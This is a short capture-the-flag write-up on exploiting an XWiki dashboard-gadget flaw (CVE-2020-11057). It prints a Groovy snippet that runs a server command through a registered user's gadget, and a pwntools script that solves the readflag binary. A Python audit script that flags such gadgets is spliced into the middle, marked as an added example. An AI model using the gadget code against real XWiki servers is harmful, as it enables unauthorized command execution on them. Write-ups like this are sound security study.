GACTF: XWiki


Article source: EDI Security

01

Links

https://jira.xwiki.org/browse/XWIKI-16960
https://nvd.nist.gov/vuln/detail/CVE-2020-11057

02

Audit

Register a user, log in, and add a gadget to the dashboard in the back end.

    // Run a command on the server and print each line of its output
    r = Runtime.getRuntime()
    proc = r.exec('dir /');
    BufferedReader stdInput1 = new BufferedReader(new InputStreamReader(proc.getInputStream()));
    String s1 = null;
    while ((s1 = stdInput1.readLine()) != null) { print s1; }
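A defender-side check for the gadget abuse shown above, as an added example that is not part of the original write-up or of XWiki's own code: it scans exported gadget records for script macros and flags those whose author lacks script rights or whose body spawns a process. The record fields (`author`, `title`, `content`), the `script_users` set and the sample data are assumptions constructed for illustration.

```python
import re

# XWiki script macros that run server-side code ({{name}} ... {{/name}}).
SCRIPT_MACROS = ("groovy", "python", "velocity")
MACRO_RE = re.compile(
    r"\{\{(%s)\b[^}]*\}\}(.*?)\{\{/\1\}\}" % "|".join(SCRIPT_MACROS),
    re.DOTALL | re.IGNORECASE,
)
# Calls that start an OS process from Groovy/Java or Python.
PROCESS_RE = re.compile(
    r"Runtime\s*\.\s*getRuntime|\.exec\s*\(|ProcessBuilder"
    r"|\.execute\s*\(|os\.system|subprocess"
)

def audit_gadgets(gadgets, script_users):
    """Flag script macros in gadget fields; 'high' if unprivileged author or process spawn."""
    findings = []
    for g in gadgets:
        for field in ("title", "content"):
            for m in MACRO_RE.finditer(g.get(field, "")):
                spawns = bool(PROCESS_RE.search(m.group(2)))
                unprivileged = g["author"] not in script_users
                findings.append({
                    "author": g["author"],
                    "field": field,
                    "macro": m.group(1).lower(),
                    "spawns_process": spawns,
                    "severity": "high" if (spawns or unprivileged) else "info",
                })
    return findings

# Constructed sample data (hypothetical export format, not XWiki's own schema).
SAMPLE_GADGETS = [
    {"author": "XWiki.newuser", "title": "Notes",
     "content": "{{groovy}}r = Runtime.getRuntime()\nproc = r.exec('dir /')\n{{/groovy}}"},
    {"author": "XWiki.Admin", "title": "Stats",
     "content": "{{velocity}}$xwiki.getDocument('Main.WebHome').title{{/velocity}}"},
    {"author": "XWiki.newuser", "title": "Links", "content": "[[Home>>Main.WebHome]]"},
]
SCRIPT_USERS = {"XWiki.Admin"}  # accounts assumed to hold script rights

if __name__ == "__main__":
    for f in audit_gadgets(SAMPLE_GADGETS, SCRIPT_USERS):
        print(f)
```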


03

Listing the files in the root directory

04

Decoding

Found readflag and pulled the file out using base64 encoding.

05

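Result

It's basically a little game; couldn't be bothered to look at the algorithm.

    from pwn import *
    import re

    context.log_level = 'DEBUG'
    io = process("./readflag")
    flag = ""
    for i in range(464):
        io.recvuntil(b"bigger?")
        # Read the rest of the prompt line and pull out the two numbers
        s = io.recvuntil(b"\n").decode()
        t = re.findall(r"(\d.*) : (\d.*)", s)[0]
        print(t)
        # Answer 0 if the first number is bigger, otherwise 1; record each bit
        if int(t[0]) > int(t[1]):
            io.sendline(b"0")
            flag += "0"
        else:
            io.sendline(b"1")
            flag += "1"
    io.close()
    # io.interactive()
    print(flag)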

This article is original. Author: Zhang. All rights reserved by 华盟网. If you reproduce it, please credit the source: https://www.77169.net/html/269211.html